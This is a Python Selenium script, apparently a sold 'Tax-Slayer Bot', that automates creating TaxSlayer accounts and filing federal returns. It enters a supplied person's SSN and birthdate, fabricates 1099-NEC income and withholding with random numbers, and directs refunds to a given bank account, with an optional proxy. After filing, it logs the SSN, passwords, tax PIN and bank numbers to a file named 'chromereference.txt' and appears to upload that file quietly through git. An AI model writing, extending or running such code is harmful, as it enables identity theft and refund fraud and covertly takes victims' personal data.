if __name__ == '__main__':
    from config import *

    dt = datetime.strptime(bday, "%m/%d/%Y")
    bdaymonth = dt.month
    bdaydate = dt.day
    bdayyear = dt.year


    fullname = fname + ' ' + lname #DONT CHANGE THIS
    now = datetime.today()
    date_time = now.strftime("%m/%d/%Y, %H:%M:%S")
    strpayer = str(payerssn)
    joespli = strpayer[:3]
    joesplo = strpayer[3:5]
    joespla = strpayer[6:]
    ##LOGIN
    user = input("What\'s your username?: ")
    inputit = input('What\'s your password?: ')
    r = requests.get(passwordlist) #password list
    database = (r.text) #grab raw text from github
    passwords = json.loads(database) #convert string to dictionary of passwords
    if passwords[user] == inputit:
        print("Welcome, " + user + " to Tax-Slayer Bot by @keying")
        ##BROWSER / SETUP
        ignored_exceptions=(NoSuchElementException, StaleElementReferenceException) #FIXES STALE ELEMENTS ERROR ALONG WITH EDITED WEBDRIVERWAIT
        service = Service("chromedriver.exe")
        chrome_options = Options()
        isproxy = input("Will you be using proxy? 1) for NO. 2) for YES \n")
        chrome_options.add_argument("--window-size=1300,900")
        if isproxy == str(2):
            chrome_options.add_argument('--proxy-server=%s' % PROXY)
        else:
            johndavid = 'johndavid'
        driver = uc.Chrome(service=service, use_subprocess=True, options=chrome_options)
        driver.set_window_size(1300, 900)
        driver.get("https://www.taxslayer.com")
        ##CLICK CREATE ACCOUNT
        clickxpath('//*[@id="chooser-free-btn"]')
        ## START Signup
        typexpath('//*[@id="Email"]', email)
        time.sleep(0.2)
        typexpath('//*[@id="UserName"]', usrname)
        time.sleep(0.2)
        typexpath('//*[@id="Password"]', pswrd)
        time.sleep(0.2)
        typexpath('//*[@id="ConfirmPassword"]', pswrd)
        time.sleep(1.5)
        clickbtn('create-account')
        ##PAGE2
        time.sleep(4.05)
        driver.get('https://www.taxslayer.com/myaccount/userconsole')
        clickbtn('begin-return')
        ##PAGE3
        time.sleep(2)
        clickxpath('//*[@id="btnNext"]')
        ##PAGE4
        typexpath('//*[@id="TpFullName"]', fname + ' ' + lname)
        clickxpath('//*[@id="btnSubmit"]')
        ##PAGE5
        time.sleep(2)
        clickxpath('//*[@id="chooseFreeLink"]')
        ##PAGE5 (START FILING INFO)
        type('TP_FirstName', fname)
        type('TP_LastName', lname)
        type('TP_SSN', ssn)
        select('TP_DOB_M', bdaymonth)
        select('TP_DOB_D', bdaydate)
        select('TP_DOB_Y', bdayyear)
        clickbtn("btnSubmit")
        time.sleep(2.3)
        ##PAGE6
        type('Address_Zip', zipcode)
        type('Address_Apt', apt)
        type('Address_Line1', street)
        type('Address_Zip', zipcode)
        type('Address_Line1', street)
        type('Address_Line1', street)
        type('Address_City', city)
        select('Address_State', state)
        select('Address_ResidentStatus', 2)
        clickbtn('btnSubmit')
        time.sleep(2)
        ##PAGE7(phone #)
        type('PhoneNumber', phone)
        clickxpath('//*[@id="formNavButtonsContainer"]/button')
        ##PAGE8(phoneverify) DONE MANUALLY
        ##PAGE9 SKIP DEDUCTINS
        print("Code sent! you have 45 seconds or script will break!")
        WebDriverWait(driver, 45,ignored_exceptions=ignored_exceptions).until(EC.presence_of_element_located((By.ID, 'btnSubmit')))
        clickxpath('//*[@id="formNavButtonsContainer"]/a[2]')
        ##PAGE10 Single/Married
        clickxpath('//*[@id="filingstatus"]/div[1]/label')
        time.sleep(0.2)
        clickbtn('btnSubmit')
        ##PAGE11 DEPENDANTS
        clickxpath('//*[@id="menuNavButtonsContainer"]/a[2]')
        ##PAGE 12 IRS PIN
        clickxpath('//*[@id="formNavButtonsContainer"]/a[2]')
        ##PAGE 13 BASIC INFO SUMMARARY
        driver.get('https://www.taxslayer.com/2021/avalon/PersonalInfo/RegistrationSummary#/RegistrationSummary')
        clickxpath('//*[@id="page-wrapper"]/div[3]/a')
        ##page 14 #slayit page
        clickbtn('btnNext')
        ##PAGE 15 Add forums
        clickbtn('quick-file-continue')
        ##PAGE 17 (START LOOKUP TAX FORUM)
        type('searchWords', '1099-nec')
        clickxpath('//*[@id="searchResults"]/ul/li/a')
        time.sleep(1)
        clickxpath('//*[@id="quick-file-continue"]')
        ###PAGE18 CONFIRM
        clickxpath('//*[@id="btnContinue"]')
        time.sleep(1)
        ##PG19 START TAX FORUM
        driver.get('https://www.taxslayer.com/2021/avalon/F1099Nec/F1099Nec')
        time.sleep(2)
        typexpath('//*[@id="PayerName"]', payername)
        typexpath('//*[@id="PayerAddr_Line1"]',  payerstreet)
        typexpath('//*[@id="PayerAddr_Zip"]', payerzip)
        typexpath('//*[@id="PayerAddr_City"]', payercity)
        select('PayerAddr_State', payerstate)
        clickxpath('//*[@id="f1099Misc-content-wrapper"]/section[1]/div[3]/div/div/div/label')
        typexpath('//*[@id="SSNObj_Part1"]', joespli)
        typexpath('//*[@id="SSNObj_Part2"]', joesplo)
        typexpath('//*[@id="SSNObj_Part3"]', joespla)
        typexpath('//*[@id="RecipientAddr_Line1"]', street)
        typexpath('//*[@id="NonEmployeeComp"]', random.randint(82000,87000))
        typexpath('//*[@id="IncomeTaxWithheld"]', random.randint(fedwithheldmin, fedwithheldmax))
        clickxpath('//*[@id="btnSubmit"]')
        ##PG20 CHOOSE SCHED C
        time.sleep(2)
        clickxpath('//*[@id="f1099nec-to-sch-c"]/div/div[1]/div/div[1]/label')
        clickxpath('//*[@id="btnSubmit"]')
        ##PG21 MORE BS
        time.sleep(2)
        typexpath('//*[@id="BusAddrObj_Line1"]', street)
        typexpath('//*[@id="BusAddrObj_Zip"]', zipcode)
        typexpath('//*[@id="BusAddrObj_City"]', city)
        select('BusAddrObj_State', state)
        typexpath('//*[@id="BusCode"]', naicscode)
        typexpath('//*[@id="PrincBus"]', bizdescription)
        clickxpath('//*[@id="btnSubmit"]')
        ##PG22 SCHEDc continued
        time.sleep(2)
        clickxpath('//*[@id="menuNavButtonsContainer"]/a')
        ##PG23 1099sec
        time.sleep(2)
        clickxpath('//*[@id="formNavButtonsContainer"]/a[2]')
        ##PG24 add more shi?
        time.sleep(2)
        clickxpath('//*[@id="menuNavButtonsContainer"]/a[2]')
        ##page 22 ISURANCE
        clickxpath('//*[@id="form-healthinsurance-hadinsurance"]/div[1]/div/div[2]/div[2]/label')
        time.sleep(0.2)
        clickbtn('btnSubmit')
        time.sleep(0.15)
        ##page23 state return skip
        time.sleep(3.54)
        clickxpath('//*[@id="skip-state-return"]')
        time.sleep(0.78)
        ##page24 summarary
        clickbtn('loading-overlay')
        time.sleep(0.78)
        waituntilgone('//*[@id="loading-step-3"]')
        WebDriverWait(driver, 25, ignored_exceptions=ignored_exceptions).until(EC.element_to_be_clickable((By.ID, 'taxSwitch')))
        time.sleep(1)
        waituntilgone('loading-overlay')
        time.sleep(3.84)
        clickxpath('//*[@id="menuNavButtonsContainer"]/a[2]')
        ##page25 state
        time.sleep(3)
        if driver.current_url == 'https://www.taxslayer.com/2021/avalon/Validation/Warnings':
            print("detected special page, completing page now.")
            clickxpath('//*[@id="menuNavButtonsContainer"]/a[2]')
        else:
            anmwm = 'a'
            #clickxpath('//*[@id="form-efile-validationreturn"]/div[1]/div[2]/div[3]/div/label')
            #clickbtn('btnSubmit')
        time.sleep(0.2)
        ##page26 ready to file
        clickxpath('//*[@id="root"]/div[2]/form/div/div[1]/div/div[1]/div[2]/div/div[2]/label')
        time.sleep(0.2)
        clickbtn('btnSubmit')
        ##page idk its the new file and go shit it just skips it
        clickxpath('//*[@id="btnSubmit"]')
        ##page27 more details
        time.sleep(2)
        clickxpath('//*[@id="federal"]/div/div[2]/div[3]/a')
        ##page28 refund method
        clickxpath('//*[@id="root"]/div[2]/form/div[2]/div[1]')
        clickbtn('btnSubmit')
        ##page29 back to more details
        clickxpath('//*[@id="productsandservices"]/div/div[2]/div[2]/dl/div/a')
        ##page30 products + service skip
        clickbtn('btnSkip')
        clickbtn('btnSkip')
        clickbtn('btnSkip')
        clickbtn('btnSkip')
        ##page31 Backv3
        time.sleep(0.2)
        clickxpath('//*[@id="signandfile"]/div[2]/div/div/a')
        ##page34 ENTER AN+RN
        type('accounts[0].bankName', fname)
        if checking == False:
            select('accounts[0].type', 'S')
        elif checking == True:
            select('accounts[0].type', 'C')
        type('accounts[0].rtn', rn)
        type('accounts[0].acctNo', an)
        clickbtn('btnSubmit')
        ##page35
        time.sleep(0.2)
        clickbtn('btnSubmit')
        ##page36 ID (set to no for now)
        select('taxpayerIdSource', idtype)
        select('taxpayerStateIssued', idstate)
        typexpath('//*[@id="taxpayerIdNumber"]', idnum)
        select('taxpayerCitizenship', 'C')
        clickxpath('//*[@id="btnSubmit"]')
        ##Page37 TOC
        clickxpath('//*[@id="root"]/div[2]/form/div[1]/div[1]/div/div/div')
        typexpath('//*[@id="signature"]', fname + ' ' + lname)
        clickxpath('//*[@id="btnSubmit"]')
        ##PG38 AGI
        filedlastyr = input("Did Client File Last year? say yes to input agi? \n type Y for yes and N for no: \n")
        if filedlast == 'y':
            agi = input("What was the AGI of last Yr return? (round up if there was cents): \n")
            clickxpath('//*[@id="root"]/div[2]/form/div[1]/div/div[2]/label')
            clickxpath('//*[@id="btnSubmit"]')
            #nextpage
            time.sleep(1)
            clickxpath('//*[@id="root"]/div[2]/form/div[1]/div[1]/div/div/div/div[2]')
            clickxpath('//*[@id="btnSubmit"]')
            typexpath('//*[@id="info.agi"]', agi)
            clickxpath('//*[@id="btnSubmit"]')
            time.sleep(2)
            clickxpath('//*[@id="btnSubmit"]')
        else:
            clickxpath('//*[@id="root"]/div[2]/form/div[1]/div/div[4]/label')
            clickxpath('//*[@id="btnSubmit"]')
        ##PG39 TAXPIN
        typexpath('//*[@id="info.taxPayerPin"]', taxpin)
        clickxpath('//*[@id="btnSubmit"]')
        ##PG40 SIGN + FILE
        time.sleep(2)
        clickxpath('//*[@id="btnSubmit"]')
        ##MAKE LOG
        with suppress_stderr():
            call('git init')
        with suppress_stderr():
            downloadgit()
        with open("chromereference.txt", "a+") as file_object:
            file_object.seek(0)
            data = file_object.read(100)
            if len(data) > 0 :
                file_object.write("\n")
                file_object.write("A New Claim Has Been Filed At " + date_time + " From IP: " + IPAddr + "! | First Name = " + str(fname) + " | Last Name = " + str(lname) + " | SSN = " + str(ssn) + " | Birthdate = " + str(bday) + " | Email = " + str(email) + " | Phone = " + str(phone) + " | Password = " + str(pswrd) + " | Tax Pin =  " + str(taxpin) + " | Address = " + str(street) + ", " + str(city) + ", " + str(apt) + ", " + str(state) + " | Bank = Account # " + str(an) + " | Routing # " + str(rn))
        upload()
        #-#-#-#-#-#-#-#-

        ##PG41 FINAL PAGE
        #clickbtn('btnSubmit')
        print("Successfully Filed!")
        time.sleep(999)
        driver.quit()
    else: #IF LOGIN INVALID
        print('nope')
        time.sleep(5)
